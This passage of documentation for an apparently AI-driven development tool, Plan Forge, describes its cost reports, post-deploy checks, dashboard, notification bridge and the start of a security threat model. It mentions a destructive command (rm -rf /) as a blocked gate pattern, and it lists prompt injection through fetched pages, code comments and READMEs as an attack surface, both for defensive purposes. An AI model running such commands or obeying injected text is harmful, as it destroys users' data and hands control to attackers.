GET /api/cost/report?scope=month&groupBy=model

# Per-run breakdown (granular: every LLM call)
GET /api/cost/report?runId=run-2026-05-18-091234

# Last-30-day rollup by role (worker vs reviewer vs quorum vs forge-master)
GET /api/cost/report?scope=month&groupBy=role

Records come straight out of .forge/cost-history.json, one row per LLM call, with run id, slice, role, model, token counts, and dollar amount (or xAI ticks). The file is plain JSONL; you can pipe it through jq, import to DuckDB, or load to a spreadsheet without going through the API. Plan Forge does not enforce budgets, send alerts, or phone provider invoices, the data is yours; the policy is yours.

Worked example: a real slice

From the recent v3.6.2 manual-completion phase, slice B5 ship REST API reference appendix:

Item	Value
Mode	`auto` quorum, 3 models on hardening, 1 model on execution
Files touched	10 (1 new, 9 modified)
Worker input tokens	~42,000 (system + scope + 9 referenced files at ~3K each)
Worker output tokens	~6,400 (mostly the new `rest-api-reference.html`)
Cache hit on system block	Yes (Anthropic, 0.10× on ~3,200 cached tokens)
Validation passes	2 (one failed on broken cross-refs, ~5K extra worker tokens to fix)
Total provider spend	~$0.78
Equivalent `power` mode estimate	~$6.20 (8× multiplier)
Equivalent `disabled` estimate	~$0.26 (single model, but expected reduction in reviewer-catch rate raised retry risk; auto was the right pick)

The lesson: auto mode with right-sized slices and tight gates kept a 600-line appendix delivery under a dollar. The estimator predicted $0.71; actual was $0.78, a 10% miss attributable to the second validation pass, which the estimator does not yet model.

What Is LiveGuard?

The forge builds your software. LiveGuard watches the gates after it ships.

Four functional groups. LiveGuard ships as four bundles that compose into one defense posture: nine post-coding tools (drift, incidents, health DNA, secrets, regression, triage, journals, hotspots, snapshots); secret scanning and env diff; fix proposals, quorum analysis, and lifecycle hooks; composite health checks, auto-chaining, and incident auto-resolution.

The Problem LiveGuard Solves

Plan Forge sessions end when the code ships. The forge hardens your plan, executes your slices, and pushes a clean commit. Then it stops, because that's the right boundary for a build-time tool.

But software doesn't stop when the build does. Secrets drift into environment variables. Dependencies acquire CVEs. Configuration diverges between environments. The regression gate you wrote last month no longer covers the new payment flow. None of these are build-time failures, they're post-coding failures. And without a watch on the gates, they grow silently until they become incidents.

LiveGuard is what watches after the forge stops.

LiveGuard Intelligence

LiveGuard doesn't just observe, it learns. Every finding feeds back into the system:

Recurring Incident Detection, When the same files trigger incidents 3+ times in 30 days, LiveGuard auto-escalates the severity and marks the pattern as systemic.
Fix Proposal Outcome Tracking, When a regression guard passes after a fix proposal was generated, the proposal is marked as "effective." Over time, the system learns which fix patterns work.
Hotspot Test Priority, High-churn files (from forge_hotspot) are tested first by the regression guard. Risk-based testing, test the code most likely to break.
Project Health DNA, A composite fingerprint combining drift score, incident rate, test pass rate, model success rate, and cost per slice. Persisted to .forge/health-dna.json for cross-session decay detection.

The Lifecycle Position

LiveGuard occupies the operational phase, after code is shipped but before (and alongside) production APM:

Specify

→

Plan

→

Execute

→

Ship

→

🛡️ LiveGuard Watches

The forge pipeline (Chapters 1–14) covers everything left of the arrow. LiveGuard picks up at the right.

What LiveGuard Is Not

LiveGuard is not an APM (Application Performance Monitoring) system. It doesn't instrument your production runtime, collect request traces, or measure p99 latency. Tools like Datadog, New Relic, and Application Insights already do that well.

LiveGuard operates at the project level, not the request level. It watches your codebase, your environment files, your dependency tree, and your deployment history, the things that change between builds, not between HTTP requests. Think of it as a quality gate that stays active between coding sessions.

The Guardian Metaphor

In the forge metaphor, the build pipeline is the smith, it shapes raw material into a finished product. LiveGuard is the guardian posted at the gate after the smith finishes. The guardian doesn't shape the metal; it watches for cracks, drift, and intrusions that appear over time.

Each LiveGuard tool is a different kind of watch:

Drift watch, architecture diverging from the plan baseline (forge_drift_report)
Incident watch, production failures and MTTR tracking (forge_incident_capture)
Dependency watch, new CVEs in your dependency tree (forge_dep_watch)
Regression watch, validation gates that used to pass now fail (forge_regression_guard)
Churn watch, files that change too frequently signal instability (forge_hotspot)
Secret watch, high-entropy strings committed in diffs (forge_secret_scan)
Env watch, configuration key divergence across environments (forge_env_diff)

When to Run LiveGuard Tools

LiveGuard tools are designed for three trigger points:

When	Tools to Run	Why
After every plan execution	forge_drift_report, forge_regression_guard	Catch architecture drift while context is fresh
Before a deploy	forge_secret_scan, forge_env_diff, forge_dep_watch	Block secrets, missing env keys, and new CVEs from reaching production
On a schedule (daily / weekly)	forge_health_trend, forge_alert_triage, forge_hotspot	Trend analysis and prioritized alert review
After an incident	forge_incident_capture, forge_runbook	Record the incident and generate a response runbook

In v2.29, lifecycle hooks automate this, PreDeploy runs secret scan and env diff automatically before any deploy command, and PostSlice runs drift analysis after every commit.

Next steps: See Chapter 17 — LiveGuard Tools Reference for every tool and its CLI flags. See Chapter 18 — The LiveGuard Dashboard to learn the real-time monitoring UI.

14 floating forge tools with colored auras arranged around a glowing amber anvil in a dark workshop

Act III, Guard with LiveGuard · Chapter 17

LiveGuard Tools Reference

14 post-coding intelligence tools. Each guards a different gate.

What LiveGuard is: and isn't.

LiveGuard is a build-time and pre/post-deploy guardrail layer. It runs in your CI / dev shell / dashboard. It looks at the codebase, the plan that built it, the dependencies, and the env config, before traffic ever sees the change.
LiveGuard is not an APM like Datadog, New Relic, or Sentry. It does not instrument running production traffic. It does not track per-request latency, error rates, or live user sessions. Use APMs for those things and run LiveGuard alongside them, the two layers complement each other.
The mental model: APMs answer “is the running app healthy right now?” LiveGuard answers “is what we just shipped safe to ship, and is the codebase staying within the architectural rules over time?”

v2.30.0, 14 tools shipped. Per-tool reference below includes CLI invocation, options, output shape, thresholds, and integration notes.

Tool Index

LiveGuard tools grouped by trigger window into 3 swimlanes: After Execution (amber, PostSlice hook) holds drift_report, regression_guard, runbook, and deploy_journal. Before Deploy (red, PreDeploy hook) holds secret_scan, env_diff, dep_watch, and liveguard_run; blocks deploy on high-severity findings. On Schedule (purple, cron/watcher) holds health_trend, hotspot, incident_capture, and alert_triage. Each tool tile shows what it catches and how it's invoked. — Figure 17-1. LiveGuard tools grouped by trigger window into 3 swimlanes

All 14 LiveGuard tools are available as MCP tools and via REST API. Full reference per tool below.

Tool	What It Guards	Since
forge_drift_report	Architecture drift vs. plan	v2.27
forge_incident_capture	Incident log + MTTR tracking	v2.27
forge_dep_watch	Dependency vulnerability changes	v2.27
forge_regression_guard	Regression gate pass/fail history	v2.27
forge_runbook	Operational runbook store	v2.27
forge_hotspot	High-churn / high-failure files	v2.27
forge_health_trend	Long-term health + MTTBF trending	v2.27
forge_alert_triage	Ranked cross-signal alert list	v2.27
forge_deploy_journal	Deploy log with pre/post health	v2.27
forge_secret_scan	High-entropy secret detection in diffs	v2.28
forge_env_diff	Environment variable key divergence	v2.28
forge_fix_proposal	Scoped fix plan from regression/drift/incident/secret failure, human-approved only	v2.29
forge_quorum_analyze	Structured quorum prompt assembly from LiveGuard data, no LLM calls in server	v2.29
forge_liveguard_run	Composite health check, runs all LiveGuard tools in one call, returns unified green/yellow/red status	v2.30

All 14 LiveGuard tools ship in the default install.

forge_drift_report

Scores codebase against architecture guardrail rules from instruction files. Tracks drift over time in .forge/drift-history.json. Fires a bridge notification when the score drops below the configured threshold.

CLI

pforge drift [--since <ref>]

Option	Default	Description
--since	HEAD~5	Git ref for comparison baseline
--threshold	70	Score below which a bridge notification fires

Output: { score, delta, violations[], timestamp }. Score is 0–100; higher is better. delta is the change since the previous run.

forge_incident_capture

Records incidents with severity, affected files, and MTTR tracking. Dispatches on-call notification via the .forge.json onCall config if present.

CLI

pforge incident "<description>" [--severity critical|high|medium|low] [--files f1,f2] [--resolved-at ISO]
pforge triage    # list ranked open alerts (incidents + drift violations)

Option	Default	Description
severity	medium	One of: critical, high, medium, low
files	[]	Affected file paths
description	—	Human-readable incident description

Output: { incidentId, severity, mttr, onCallNotified, storedAt }. Incidents are appended to .forge/incidents.jsonl (one JSON record per line).

forge_dep_watch

Scans dependencies for CVEs using npm audit. Compares against a previous snapshot in .forge/deps-snapshot.json. Alerts on new vulnerabilities only, unchanged findings are suppressed.

CLI

pforge dep-watch

Output: { newVulnerabilities[], resolvedVulnerabilities[], unchanged, snapshot }. Fires a dep-vulnerability hub event when new CVEs appear.

forge_regression_guard

Extracts validation gate commands from plan files, executes them against the codebase, and reports pass/fail/blocked results. Used by the PostSlice hook and manually after refactors.

CLI

pforge regression-guard [--plan <plan-file>]

Option	Default	Description
--plan	all plans in docs/plans/	Specific plan file to check gates for

Output: { gates[], passed, failed, blocked, summary }. Commands are allow-listed via GATE_ALLOWED_PREFIXES, dangerous patterns like rm -rf / are blocked.

forge_runbook

Generates a human-readable operational runbook from a hardened plan file. Optionally appends recent incidents for context. Saves to .forge/runbooks/.

CLI

pforge runbook <plan-file>    # generate a runbook from a hardened plan

Naming: Plan filename → lowercase → non-[a-z0-9-] replaced with hyphens → collapse → append -runbook.md.

forge_hotspot

Identifies git churn hotspots, files that change most frequently. Uses a 24-hour cache to avoid repeated git log queries.

CLI

pforge hotspot [--top 10] [--since 30d]

Option	Default	Description
--top	10	Number of hotspot files to return
--since	30d	Time window for churn analysis

Output: { hotspots[{ file, changeCount, lastChanged }], since, cachedUntil }.

forge_health_trend + Health DNA v2.32

Aggregates drift scores, cost history, incident frequency, model performance, and test pass rates over a configurable time window. Returns an overall health score 0–100 plus a Health DNA fingerprint for decay detection.

CLI

pforge health-trend [--window 30d]

Output: { healthScore, drift, cost, incidents, models, tests, healthDNA }.

Health DNA (.forge/health-dna.json): Composite fingerprint, driftAvg, incidentRate, testPassRate, modelSuccessRate, costPerSlice. Compare across time to detect project decay before it manifests as bugs.

forge_alert_triage

Reads incidents and drift violations, ranks by priority (severity × recency), and returns a prioritized list. Read-only, never modifies data.

CLI

pforge alert-triage

Output: { alerts[{ source, severity, priority, description, timestamp }], totalAlerts }. Priority is a computed score, higher means "address first".

forge_deploy_journal

Records deployments with version, deployer, notes, and an optional slice reference. Correlates with forge_incident_capture so incidents can be linked to the deploy that introduced them.

CLI

pforge deploy-log [--tag <tag>] [--notes "..."]

Output: { deployId, version, deployer, timestamp, notes }. Stored in .forge/deploy-journal.jsonl.

forge_secret_scan v2.28

Scans git diff output for high-entropy strings using Shannon entropy analysis. Never logs actual secret values, all findings are masked to <REDACTED> in output, cache, and telemetry.

CLI

pforge secret-scan [--since HEAD~1] [--threshold 4.0]

Option	Default	Description
--since	HEAD~1	Git ref to diff against
--threshold	4.0	Shannon entropy threshold (higher = fewer but more confident findings)

Output:

{
  "scannedAt": "2026-04-13T...",
  "since": "HEAD~1",
  "threshold": 4.0,
  "scannedFiles": 5,
  "clean": false,
  "findings": [{
    "file": "src/config.js",
    "line": 5,
    "type": "api_key",
    "entropyScore": 4.8,
    "masked": "<REDACTED>",
    "confidence": "high"
  }]
}

Security: Cache file (.forge/secret-scan-cache.json) stores only file paths, line numbers, entropy scores, and <REDACTED> placeholders. If git is unavailable, the tool degrades gracefully with { clean: null, scannedFiles: 0 }. May annotate .forge/deploy-journal-meta.json sidecar with scan results.

forge_env_diff v2.28

Compares environment variable key names across .env files. Identifies keys present in the baseline but missing in targets (and vice versa). Never reads, logs, or caches environment variable values.

CLI

pforge env-diff [--baseline .env] [--files .env.staging,.env.production]

Option	Default	Description
--baseline	.env	The reference environment file
--files	.env.*	Comma-separated target files to compare

Output:

{
  "scannedAt": "2026-04-13T...",
  "baseline": ".env",
  "filesCompared": 2,
  "pairs": [{
    "file": ".env.staging",
    "missingInTarget": ["STRIPE_KEY"],
    "missingInBaseline": []
  }],
  "summary": { "clean": false, "totalGaps": 1, "baselineKeyCount": 12 }
}

Security: Cache file (.forge/env-diff-cache.json) stores key names only. Values are never read from the environment files, the parser extracts the key portion of each KEY=value line and discards the rest.

Related: See Appendix F — LiveGuard Alert Runbooks for how to respond when each tool fires an alert.

.forge.json Schema

LiveGuard tools read configuration from .forge.json at project root. Below are the root-level fields relevant to LiveGuard.

Field	Type	Description
bridge	object	Bridge configuration, `url` (string), `approvalSecret` (string). Used for webhook notifications and approval gates.
model	string	Default AI model for plan execution (e.g., `"claude-sonnet-4.6"`).
onCall	object	On-call routing for incident notifications. `name` (string, required), person or team name. `channel` (string, required), notification channel ID or webhook. `escalation` (string, optional), escalation target if primary is unavailable.
hooks	object	Lifecycle hook configuration, `preDeploy`, `postSlice`, `preAgentHandoff`. See v2.29 for details.
openclaw	object	OpenClaw analytics bridge, `endpoint` (string), `apiKey` (string, see .forge/secrets.json).

Example .forge.json with LiveGuard fields:

{
  "bridge": { "url": "https://hooks.slack.com/...", "approvalSecret": "..." },
  "model": "claude-sonnet-4.6",
  "onCall": { "name": "Platform Team", "channel": "#incidents", "escalation": "eng-lead" },
  "hooks": {
    "preDeploy": { "enabled": true },
    "postSlice": { "enabled": true },
    "preAgentHandoff": { "enabled": true }
  },
  "openclaw": { "endpoint": "https://your-openclaw-instance" }
}

Validation: forge_smith checks onCall, if the field exists, it verifies that both name and channel are present and emits a warning (not an error) if either is missing.

Forge control room with curved screens showing health gauges and holographic displays above an anvil console

Act III, Guard with LiveGuard · Chapter 18

The LiveGuard Dashboard

The same unified dashboard, extended with a LIVEGUARD section, 7 real-time tabs driven by WebSocket hub events.

Dashboard LiveGuard section. 7 tabs: Health, Incidents, Triage, Security, Env, Watcher, Bug Registry. Quorum Analysis links and Fix Proposals Feed are available. forge_liveguard_run composite results are displayed inline.

Opening the Dashboard

The LiveGuard section is part of the unified Plan Forge dashboard, no separate app or port required:

Terminal

node pforge-mcp/server.mjs

Open localhost:3100/dashboard. The LIVEGUARD section appears in the tab bar after a visual divider, separated from the FORGE section.

Two Sections, One Dashboard

The tab bar uses a two-section layout:

Progress

Runs

Cost

···

LIVEGUARD

🛡️ Health

Incidents

Triage

Security

Env

Watcher

Bug Registry

FORGE tabs use a blue active indicator. LIVEGUARD tabs use amber, you always know which half of the dashboard you're in.

Health Tab

The Health tab shows aggregate project health powered by forge_health_trend. Key widgets:

Health Score, a single 0–100 number, color-coded: green (80+), amber (50–79), red (<50). Computed from drift, incidents, cost, and model performance.
Drift Trend, 30-day line chart of architecture drift scores. The x-axis is time; the y-axis is score 0–100.
MTTBF, Mean Time Between Failures, calculated from incident timestamps. Lower is worse.
Cost Trend, monthly aggregated cost from forge_cost_report.

The Health tab auto-refreshes on every liveguard-tool-completed WebSocket event. No manual refresh needed.

Incidents Tab

Live list of open incidents from .forge/incidents.jsonl. Each card shows:

Incident ID, unique identifier
Severity badge, color-coded: red (critical), orange (high), yellow (medium), grey (low)
MTTR, time elapsed since the incident was captured, updated in real-time
On-call, engineer name from .forge.json onCall config
Affected files, file list, clickable to view in editor

Fix Proposals Feed, when forge_fix_proposal has generated plans, a Proposed Fixes section appears at the top of the Incidents tab. Each entry shows the proposal file path, source type (regression/drift/incident/secret), and a Run in Assisted Mode → button that opens the Actions tab pre-filled with the plan path. The feed reads from GET /api/fix/proposals on tab load and on every fix-proposal-ready hub event.

Triage Tab

Displays the output of forge_alert_triage, a ranked list of all open alerts sorted by priority (severity × recency). Each row shows:

Source, which tool generated the alert (drift, regression, dep-watch, etc.)
Severity, badge matching the severity matrix in Appendix F
Priority score, computed rank (higher = address first)
Description, one-line summary
Timestamp, when the alert was generated

Critical and high alerts show a red/amber left-border on their row. The tab badge shows the total number of unresolved critical+high alerts.

Security Tab

Surfaces results from forge_secret_scan. Shows:

Scan status, clean (green shield) or findings (red shield with count)
Findings list, file path, line number, type (api_key, token, etc.), entropy score, confidence level. Values are never shown, only <REDACTED> placeholders.
Last scan time, from cache file
Run Scan button, triggers POST /api/secrets/scan

The Security tab reads from .forge/secret-scan-cache.json on load and refreshes on liveguard-tool-completed events where tool === "forge_secret_scan".

Env Tab

Key-by-key comparison of all .env.* files in the project root, powered by forge_env_diff.

Key matrix, rows are env keys, columns are files. Present keys show a ✓; missing keys show a ✗.
Gap count, total missing keys, highlighted in the tab badge
Values are never displayed, the Env tab shows key names only
Run Diff button, triggers POST /api/env/diff

The tab reads from .forge/env-diff-cache.json on load. Cache is refreshed when forge_env_diff completes.

Quorum Analysis from the Dashboard

The Health and Incidents tabs each include a Run Quorum Analysis → link. Clicking it calls GET /api/quorum/prompt?source=<tab-source>&goal=risk-assess and opens a pre-populated quorum prompt in the Actions tab, ready to copy into your AI client. No model calls happen from the dashboard, it assembles the prompt for you.

Help Links from the Dashboard

Each LiveGuard tab header includes a Docs ↗ link. Clicking it opens this chapter in a new tab, you never lose your live dashboard session. The section header also has a Docs link pointing to this page's overview.

Related: See Chapter 17 — LiveGuard Tools Reference for the CLI tools that power each widget. See Appendix F for how to respond to alerts.

Tall stone watchtower at dusk with amber lantern-eyes scanning a foggy valley dotted with distant forge fires, read-only observation of other projects' forge runs

Act III, Guard · Chapter 19

The Watcher

A second pair of eyes on a running forge. Read-only by design.

New here? Read this first. You kick off a long Plan Forge run, maybe an hour of work across 30 slices, and you want to watch it happen without distracting the AI that's doing the work. The Watcher is exactly that: open a second VS Code window, point it at the running project, and ask “how's it going?” The Watcher reads the live event stream and tells you. It cannot edit, commit, or change anything in the project being watched, that's a safety guarantee, not a feature gap.

Snapshot mode, instant point-in-time read. Free. “Slice 12 of 30, no errors, $4 spent so far.”
Analyze mode, same data but with an AI summary. Costs a few cents. “Run is healthy but Slice 8 retried twice on a flaky test, worth investigating.”
Live tail, short streaming window (default 60 seconds). Useful when you suspect something is hanging.

Read-only watcher. The Watcher runs in a separate VS Code Copilot session with Plan-Forge as the workspace and points at another project that's executing a plan. It cannot modify anything in the target, it only reads.

Why a Watcher?

When you execute a long plan (pforge run-plan) the executor session is focused on one thing: building the next slice. It's not a good place to also answer "how's it going?" for a second human, or to notice anomaly patterns across multiple runs. The Watcher is the operational counterpart, it tails the run, reads event streams, and summarizes state.

Two-session topology: Session 1 (Build/Target) runs pforge run-plan in a VS Code window, with its own WebSocket hub on port 3101 and append-only files in .forge/runs/. Session 2 (Watcher) runs in a second VS Code window with its own working directory and uses forge_watch (snapshot, file reads only, $0) and forge_watch_live (bounded window WebSocket subscription with polling fallback). Watcher writes only to its own .forge/watch-history.jsonl, never to the target. The watcher's input schema exposes no write paths to the target. — Figure 19-1. Two-session topology

Two modes, one tool:

Snapshot (forge_watch), file-reads only, zero AI cost. Returns slice counts, token usage, gate errors, anomalies.
Analyze (forge_watch with mode=analyze), invokes a frontier model (default claude-opus-4.7) to produce narrative advice from the snapshot.

Live Tail — `forge_watch_live`

For near-live observation, forge_watch_live tails the event stream for a bounded window:

WebSocket mode, connects to the target's hub if running (.forge/server-ports.json).
Polling fallback, tails events.log when the hub isn't up.
Default window: 60 seconds. Range: 1 s – 1 hr.
Captures up to 500 events in the response payload.

Snapshot vs Live Tail comparison table: Data source (file reads vs WebSocket/log tail), Cost ($0 always vs $0 baseline + frontier model in analyze mode), Window (point-in-time vs bounded durationMs default 60s), Returns (counts/anomalies/advice/cursor vs event stream up to 500 events), Best for (spot checks vs live debugging), History (watch-history.jsonl vs cursor chaining). — Figure 19-2. Snapshot vs Live Tail comparison table

Typical usage from the Watcher session

forge_watch {
  targetPath: "E:/GitHub/Rummag",
  mode: "snapshot"
}

forge_watch_live {
  targetPath: "E:/GitHub/Rummag",
  durationMs: 30000
}

Anomaly Rules

The snapshot watcher runs heuristic rules over the run state and surfaces anomalies automatically. Examples:

review-queue-backlog, independent reviewer slices piling up.
tempering-run-failed, a Tempering run returned non-zero.
mutationBelowMinimum / flakyCount / perfRegressionCount, Tempering quality thresholds breached.
Crucible funnel stalls, ideas stuck in Crystallized with no hardener handoff.

Anomalies are emitted as watch-anomaly-detected hub events and appear in the dashboard's Watcher tab.

Distributed teams or remote runs? The Watcher only observes what's on the same machine. To watch a forge running on another host, or to forward anomalies to phones, Slack, or Discord, pair it with the companion Chapter 20 — The Remote Bridge.

Watch History

When recordHistory=true (the default in v2.35+), each snapshot is appended to the Watcher session's own .forge/watch-history.jsonl, never the target's. Pair with sinceTimestamp (pass the previous report's cursor) for gap-free continuous monitoring across multiple invocations.

Dashboard Watcher Tab

The dashboard's Watcher tab consumes two event types:

watch-snapshot-completed, emitted when forge_watch builds a snapshot.
watch-anomaly-detected, emitted when one or more anomaly rules fire.

Chip rows surface Tempering state, Crucible funnel state, and a Home chip showing in-flight runs / open incidents / open bugs, all without touching the target project.

Security Model

Read-only by contract. The Watcher's input schema exposes no write paths. It reads .forge/runs/<runId>/ and emits events to its own hub. History writes go only to the Watcher's cwd. Verified by the read-only subscriber test in pforge-mcp/tests/.

Pairing the Watcher With the Remote Bridge

A natural pairing: the Watcher runs headless on a long run, and the Remote Bridge (Chapter 20) forwards hub events to Telegram, Slack, Discord, or OpenClaw so you can check progress from your phone. The Watcher never pushes, it just observes; the Remote Bridge decides what to surface.

Act III, Guard · Chapter 20

The Remote Bridge

Forward hub events off-box. Approve slices from your phone. One config, four channels.

Shipped in Phase FORGE-SHOP-03 (commits 551b850, 5b5a8e7; extended in later phases). Six channels supported out of the box: Telegram, Slack, Discord, Microsoft Teams, PagerDuty, and OpenClaw (Slack / Teams / PagerDuty / Email also ship as installable notify-* extensions under extensions/). Generic webhook routing, per-channel rate limits, and a live config watcher on the dashboard's Notifications subtab.

Why a Remote Bridge?

Plan Forge runs inside your IDE, but some decisions are not IDE-shaped. A reviewer flagged a drift anomaly at 2 AM. A quorum tie needs a human tiebreaker. An incident fired after you closed the laptop. The Remote Bridge forwards hub events to the places you already have notifications, Telegram, Slack, Discord, and supports inline approval / reject flows for the events that need a human.

Figure 20-1. Remote Bridge fan-out

The Four Channels

Channel	Best for	Approval flow
Telegram	Solo devs, inline buttons on your phone	✓ Inline buttons (approve / reject)
Slack	Team channels, rich attachments, threading	✓ Block Kit buttons
Discord	Community + OSS projects, embeds	⚠ Message-based (no inline buttons)
OpenClaw	Agent-to-agent coordination	✓ Handoff contract

Event Routing

Every hub event carries a channels array. A single event can fan out to multiple destinations:

Example routed event

{
  "type": "drift-alert",
  "severity": "high",
  "channels": ["telegram", "slack"],
  "summary": "Drift score dropped from 0.91 → 0.62 after slice 04.2",
  "approval": {
    "required": true,
    "options": ["continue", "pause", "rollback"]
  }
}

Routing is driven by a channels filter on severity and event type. High-severity LiveGuard events (secret found, env key mismatch, drift ≥ threshold) route by default; informational snapshots do not.

Approval Flow

For events with approval.required=true, the bridge renders interactive buttons (where the channel supports them). When a user clicks a button, the response flows back into the hub as an approval-response event with {channel, platform, user, decision, timestamp}. The orchestrator consumes that event to resume, pause, or roll back the run.

Rate limits are enforced per channel. Telegram caps at 30 messages/sec, Slack at 1/sec per channel, Discord at 5/5s per channel. The bridge includes a configurable limiter (commits 551b850) that queues overflow and drops low-severity events when saturated, never high-severity ones.

Configuration

Credentials live in .forge/secrets.json (gitignored). The bridge config itself is in .forge.json under remoteBridge:

.forge.json, remoteBridge stanza

{
  "remoteBridge": {
    "enabled": true,
    "channels": {
      "telegram": {
        "chatId": "-1001234567890",
        "severityFloor": "medium"
      },
      "slack": {
        "webhookPath": "slack-ops",
        "severityFloor": "high"
      }
    },
    "rateLimits": {
      "telegram": { "perSecond": 30 },
      "slack":    { "perSecond": 1 }
    }
  }
}

Secrets (TELEGRAM_BOT_TOKEN, SLACK_SIGNING_SECRET, DISCORD_WEBHOOK_URL, etc.) stay out of git via the standard .forge/secrets.json scheme documented in the Guard station reference.

Dashboard — Notifications Subtab

The dashboard's Config → Notifications subtab (shipped 5b5a8e7) gives you:

Live view of which channels are enabled and their severity floors.
Per-channel rate-limit counters and last-send timestamps.
Test-send button per channel (fires a synthetic remote-test event).
Live config watcher, edits to .forge.json reload without restart.

OpenClaw — The Agent-to-Agent Channel

OpenClaw is the exception: it's not for humans. When openclaw.endpoint is configured, the PreAgentHandoff hook posts a snapshot (drift, MTTR, open incidents) to OpenClaw before the next agent takes the turn. This lets a separate coordinator service inject context across agents in multi-agent mode, Claude to Codex, Codex to Cursor, and so on. Skipped automatically when PFORGE_QUORUM_TURN is set.

Pairing With the Watcher

A recommended pattern: the Watcher (Chapter 19) runs on a long execution, emitting anomaly events into the hub. The Remote Bridge filters those events by severity and forwards the interesting ones to Telegram. Together they give you safe, phone-friendly observation of a forge running on another box.

End-to-End Workflow

The Remote Bridge is the notification and approval layer in Plan Forge's full AI-native development lifecycle. Understanding where it fits helps you configure it correctly. The diagram below shows the three pillars, Orchestration, Memory, and Execution, and how the bridge threads through all of them.

Plan Forge Unified System: Three Pillars, Orchestration (Plan Forge, Copilot, ACP, Lifecycle Hooks, LiveGuard, Quorum Dispatcher), Memory (OpenBrain, Session Store, Recall Index, Daily Digest, Embedding Cache, Forge Master), and Execution (OpenClaw, MCP Server, Audit Loop, Dashboard, Timeline, Hammer FM) connected by memory and snapshot arrows. — Figure 20-2. Plan Forge Unified System

Here is how the Remote Bridge participates at each stage of the workflow. For the full narrative, see the unified-system blog post.

Request capture

A developer sends a message via a phone channel (Telegram, WhatsApp via OpenClaw). The Remote Bridge's inbound path, powered by the ACP (Agent Communication Protocol), delivers the message to the hub as a request-received event. The orchestrator wakes up and begins the planning stage.

Plan hardening

Once the plan is generated, the bridge sends a summary notification: "Plan hardened. 5 slices. Approve?" This is an approval-requested event with options ["approve","reject","revise"]. The developer's inline reply flows back as an approval-response event. The run does not start until approval is received.

Slice-by-slice execution

The bridge emits a completion ping after every slice: "Slice 2 done. Tests pass. ✓" Slice failures route immediately to the configured high-severity channel. The orchestrator pauses and waits for a human reply or for the auto-escalation chain to handle it.

Independent review

When the review session completes, the bridge delivers the verdict: "Review complete. 0 drift violations. Ship it?" The developer's reply triggers the ship or pause path, both of which are recorded in the hub event log with channel, platform, user, and timestamp.

Full lifecycle walkthrough. The From WhatsApp to Shipped PR blog post walks through every stage, request capture through independent review and ship, with the exact event payloads and ACP handoffs. Read it alongside this chapter for a complete picture.

A bronze-clad fortress wall of the Plan Forge shop at twilight, twin watchtowers with glowing amber rune-eyes scanning the perimeter, an iron portcullis lowered over the main forge gate, concentric defensive rune circles burning into the cobblestones, hooded threat-actor figures probing the wall and being repelled by beams of amber light, the warm forge interior glimpsed through high arrow slits

Act III, Guard · Chapter 30

Security & Threat Model

Trust boundaries, attack surface, STRIDE per subsystem, AI-specific threats, and a hardening checklist for self-hosted deployments.

Compliance posture, SOC 2 / HIPAA / PCI / FedRAMP / GDPR coverage and air-gapped / Azure Government deployment guidance live in Appendix N — Compliance & Data Residency. This chapter is the engineering view: where can a threat actor enter, what can they do once in, and what stops them. Read both before signing off a production deployment.

Orientation

Plan Forge is a developer-machine-first tool. The default deployment puts every component, orchestrator, MCP server, REST/WebSocket hub, memory store, dashboard, on a single workstation, bound to 127.0.0.1. There is no managed cloud, no shared multi-tenant control plane, no external authentication broker. This is a deliberate posture: the threat model that applies to most users is my own machine plus the LLM providers I call, and the entire surface is designed to keep it that small.

Even so, three configurations expand the surface and deserve explicit treatment:

Team mode, multiple developers share a forge through GitHub-coordinated artifacts (plans in docs/plans/, memory hints in .github/copilot-memory-hints.md). The shared surface is the git repository.
Remote Bridge, hub events are forwarded to Slack / Teams / Telegram / Discord / PagerDuty / OpenClaw. Inbound approval flows reach back through the bridge.
OpenBrain / L3 memory, cross-workspace memory is persisted to an external embedding store. The store becomes a confidentiality boundary.

Trust boundaries

Plan Forge has six trust boundaries. Each is a place where data or control crosses from one trust zone to another, and therefore a place where validation, authentication, or sanitization must happen.

Boundary	Crosses from	Crosses to	Control
1. Workspace ↔ orchestrator	Trusted: user's IDE session	Trusted: long-running Node process	OS user; no in-process auth.
2. Orchestrator ↔ LLM provider	Trusted: orchestrator	Untrusted: third-party API	TLS; API key bound by env var or `.forge/secrets.json`; provider's own auth.
3. REST / WS hub ↔ localhost clients	Trusted: bound to `127.0.0.1`	Trusted: any process on the box	Loopback binding; no token auth by design.
4. Worker ↔ plan / repo files	Trusted: orchestrator-spawned	Untrusted: file contents may include attacker text	PreToolUse hook (Forbidden Actions); scope contract.
5. Hub ↔ Remote Bridge channel	Trusted: hub event	Untrusted: third-party messenger	Per-channel webhook token; outbound only by default; inbound approvals authenticated against bridge config.
6. Memory L2 ↔ OpenBrain L3	Trusted: local L2 jsonl	Untrusted: external embedding store	Opt-in (off by default); per-record redaction; `memory.l3Endpoint` + token in `.forge.json`.

Loopback binding is the single most load-bearing control. The REST hub, WebSocket hub, and dashboard all bind to 127.0.0.1. They are not hardened against network-attached attackers. If you reverse-proxy them onto a network interface, you must front them with your own auth (mTLS, OIDC, network ACL), see Hardening checklist.

Attack surface enumeration

Every place an attacker-controlled byte can enter the system. Catalog this before reaching for STRIDE.

Surface	Input	Attacker class
REST endpoints (113 routes, Appendix W)	JSON body, query string, path params	Local process on the same box (any user with shell access).
WebSocket hub (`:3101/hub`)	Subscribe / publish frames	Same as REST.
MCP stdio channel	JSON-RPC method calls from the IDE	Whoever controls the IDE session (typically: the user, or a malicious extension).
Plan files (`docs/plans/Phase-*.md`)	Markdown + bash gate commands + scope contract	Anyone who can land a PR. Plan files are executable in the sense that gate commands run as the orchestrator user.
SKILL.md files (`.github/skills/*`)	Markdown + bash blocks per step	Anyone who can land a PR. Skills run with the same privileges as the orchestrator.
Hook scripts (`.github/hooks/*`)	PowerShell / bash invoked at lifecycle events	Anyone who can land a PR. Hooks run on every session start, every tool use, every commit.
LLM tool output (worker responses)	Free-form text, code blocks, tool calls	Indirect, an attacker who poisoned the prompt (prompt injection from a fetched URL, code comment, dependency README, etc.).
Extension catalog (`extensions/catalog.json` + installed packages)	Node packages with full file-system access	Extension author. `pforge ext add` implies trust.
Remote Bridge inbound	Approval / reject webhook calls from messengers	Anyone with the bridge token (or anyone who can spoof the messenger's HMAC if you skipped verification).

STRIDE per subsystem

The relevant threats per subsystem. Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, Elevation of privilege.

Subsystem	Top threats	Mitigation
